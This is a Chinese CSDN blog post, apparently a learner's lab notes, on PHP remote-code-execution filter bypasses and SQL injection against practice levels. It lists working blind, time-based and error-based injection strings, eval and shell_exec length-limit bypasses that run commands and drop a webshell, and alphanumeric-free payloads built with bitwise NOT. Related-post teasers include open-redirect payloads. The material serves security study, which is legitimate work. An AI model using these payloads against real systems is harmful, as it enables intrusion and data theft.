RCE绕过技巧和sql注入

已于 2024-08-11 16:47:54 修改
阅读量887 收藏 14
点赞数 12
文章标签: sql 数据库
于 2024-08-11 16:37:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chainsofted/article/details/141103033
版权

目录

函数

​编辑

HTTP参数污染案例

EVAL长度限制突破方法

第46关

第48关

第49关

Linux命令长度限制突破方法

无字母数字webshell之命令执行

函数

1.当substring()和substr()无法使用时:select * from security.users where id=1 and ascii(mid(database(),1,1))=115;

2.从左边开始查:select * from security.users where id=1 and ascii(left(database(),1))=115;

HTTP参数污染案例

EVAL长度限制突破方法

1.代码:

<?php $param = $_REQUEST['param'];  

if ( strlen($param) < 17 &&  stripos($param, 'eval') === false &&  stripos($param, 'assert') === false )

{ eval($param); }

2.自动把代码执行命令执行:?param=echo`$_GET[1]`;&1=id   是反引号`

3.?param=echo`$_GET[1]`;&1=whoami

4.创建111.txt的文件:?param=echo`$_GET[1]`;&1=touch /tmp/111.txt

1.传递文件,N是文件名,P是一句话木马p64的编码,8:?1=file_put_contents&param=$_GET[1](N,P,8);

2.?1[]=test&1[]phpinfo();&2=assert

第46关

1.查看源码有回显,使用报错注入查看用户名:?sort=1 and updatexml(1,concat(0x7e,user(),0x7e),1)

第48关

1.使用盲注ascii截取数据库长度排序:?sort=rand(ascii(substr(database(),1,1))>114)

2.1.使用盲注ascii截取数据库长度排序:?sort=rand(ascii(substr(database(),1,1))>115)

第49关

1.使用sort排序无效,都是一个界面:

2.使用rand函数来随机排序:?sort=3' and rand(true)--+

3.使用时间盲注,每一个用户都沉睡2s,写入错误的不沉睡直接出来:?sort=1' and if((ascii(substr(database(),1,1))>110),sleep(2),0)--+

Linux命令长度限制突破方法

1.代码:<?php $param = $_REQUEST['param'];

if ( strlen($param) < 8 )

{ echo shell_exec($param); }

2.执行id命令:?parm=id

3.通过重定向写入文件:?param=w>a

无字母数字webshell之命令执行

1.代码:<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

2.在7.3版本,可以通过url编码绕过:?code=(~%8F%97%8F%96%91%99%90)();

3.进行取反操作:echo urlencode(~'phpinfo');exit;

4.在php5.6版本,输入上传文件代码:

<form action="web.php" method="post" enctype="multipart/form-data">

        <input type="file" name="" id="">

        <input type="submit" value="submit">

5.上传文件就能到web.php里面去,然后生成临时文件:

6.抓包POST传参

7.抓包get传参

chainsofted
关注
分享几个绕过URL跳转限制的思路
blotemj.blog.csdn.net
08-02 1万+
一直在学习我热爱的技术知识,这么多年来,我还从来没真正的写过一篇自己的原创文章,接触到了WEB安全方面,我也积累了一点点经验, 之前本来想大范围写下挖掘漏洞的各种思路,也是我这1年多所积累下来的经验,但是无奈,编写到一半我不小心点击了一个超链接, 导致大部分都无法恢复了,因为我第一次,也没注意保存,过了许久,我最终还是鼓起勇气来写这篇文章。整个过程我没有贴图片, ...
用友 NC showcontent SQL注入漏洞复现
0xSec
04-20 626
用友NC /ebvp/infopub/showcontent 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
无字母RCE绕过取反,异或,自增,通配符)
2301_80307383的博客
07-26 602
利用php中数组与字符串强制链接,数组会强制转化为Array这个字符,在通过+号来得到我们所需要的字符。但链接上蚁剑后,由于有disable_functions里面的flag文件无法读取,找的别人的wp。取反用法就是对我们想要执行的语句通过取反符号"~"先准备好取反编码后语句,在通过(~)异或“^”,通过该符号可以通过二进制异或操作将两个字符拼接为一个。和 @ 01000000。规则:1^1=0,1^0=1,0^1=1,0^0=0。code=(语句1)(语句2)();
php rce绕过
m0_73973498的博客
10-08 2738
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
web安全-PHP-url编码取反绕过正则-思考
qq_45699846的博客
03-09 4770
web安全-PHP-url编码取反绕过正则-思考
BUUCTF:[极客大挑战 2019]RCE ME ——两种方法
m0_62879498的博客
05-16 4054
BUUCTF:[极客大挑战 2019]RCE ME 打开环境是 代码审计题 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)
羽的博客
10-18 1万+
题目例子 <?php error_reporting(0); highlight_file(__FILE__); $code=$_GET['code']; if(preg_match('/[a-z0-9]/i',$code)){ die('hacker'); } eval($code); 我们下面以命令system('ls')为例 一、异或 <?php /*author yu22x*/ $myfile = fopen("xor_rce.txt", "w"); $contents="
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞 SQL 注入漏洞是指攻击者通过构造...
华夏ERP_v2.3.1最新版SQLRCE的审计过程1
08-03
总的来说,审计华夏ERP_v2.3.1的过程中,我们需要关注SQL注入RCE两大类漏洞,通过对源码的深入理解和对数据流的追踪,找出可能的攻击路径并修复它们。这不仅能提高系统的安全性,还能增强用户对系统的信任。在实际...
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 670
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
SQL注入渗透PostgreSQL(bypass tricks)
weixin_54787877的博客
03-13 2835
我们将研究Web应用程序防火墙的绕过方法,以及在不同的查询子句中泄漏数据的方法,例如SELECT,WHERE,ORDER BY,FROM等。 简要概述一下,PostgreSQL是: […] a free and open-source relational database management system emphasizing extensibility and technical standards compliance. It is designed to handle a range o..
URL绕过-重定向
火柴人的博客
09-27 417
https://mp.weixin.qq.com/s/JpcNVqx-7ce10B6RuljtCg?client=tim&ADUIN=2308266227&ADSESSION=1569566778&ADTAG=CLIENT.QQ.5603_.0&ADPUBNO=26933
URL跳转绕过姿势
Berry2014的博客
04-04 650
POC "@" http://www.target.com/redirecturl=http://whitelist.com@evil.com "\" http://www.target.com/redirecturl=http://evil.com\a.whitelist.com "\\" http://www.target.com/redirecturl=http://evil.co...
URL跳转漏洞的一些常用绕过方法
Sys1em32 安全之路
12-13 2491
对各种绕过方法做一个汇总,方便自己使用查找。 https://aaa.com/xx?Url=http://www.test.com 文章中test为跳转网站示例,aaa为本身的域名 0x01.利用问号绕过 http://www.aaa.com/acb?Url=http://test.com?login.aaa.com test.com为你要跳转的域名,后面跟上网站自身的域名 0x0...
ctf命令执行漏洞绕过方式小结
小飒的博客
08-06 3749
测试环境: 本地:Win10 phpstudy8.1 kali2020.2 外网:单位提供的linux靶机 一、命令分隔符 %0a – 换行符, %0d – 回车符, ; – 连续指令 && – | – || – 二、空格 < <> %09 $IFS$9 ${IFS} 三、读文件 (1)more:一页一页的显示档案内容 (2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页 (3)head:查
[极客大挑战 2019]RCE ME(取反、异或绕过正则表达式、bypass disable_function)
热门推荐
qq_45521281的博客
04-21 1万+
题目进去后,很简单的代码,显然命令执行: 但是得要先绕过preg_match()中正则表达式的限制,一开始傻乎乎的直接传了个数组,妄图绕过preg_match(),这很显然是不行的。 附上大佬的文章:关于PHP正则的一些绕过方法 ...
navicate远程linux上的pgsql提示密码失败
最新发布
记录、分享、合作、共赢
09-14 184
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
SQL题目解析:外卖平台数据分析
天冬忘忧的博客
09-10 1219
在本次SQL中,我们将通过一系列查询来分析外卖平台的数据,包括用户、餐厅和订单信息。这些查询将帮助我们理解用户行为、餐厅表现和订单趋势。
HW2020安全漏洞总结:SQL注入RCE攻击
4. 绿盟UTS绕过登录:绿盟的UTS(统一威胁管理系统)存在安全缺陷,允许攻击者绕过正常的登录验证过程,可能直接访问受保护的系统资源和数据。 5. WPS命令执行漏洞:WPS办公软件中存在一个命令执行漏洞,攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值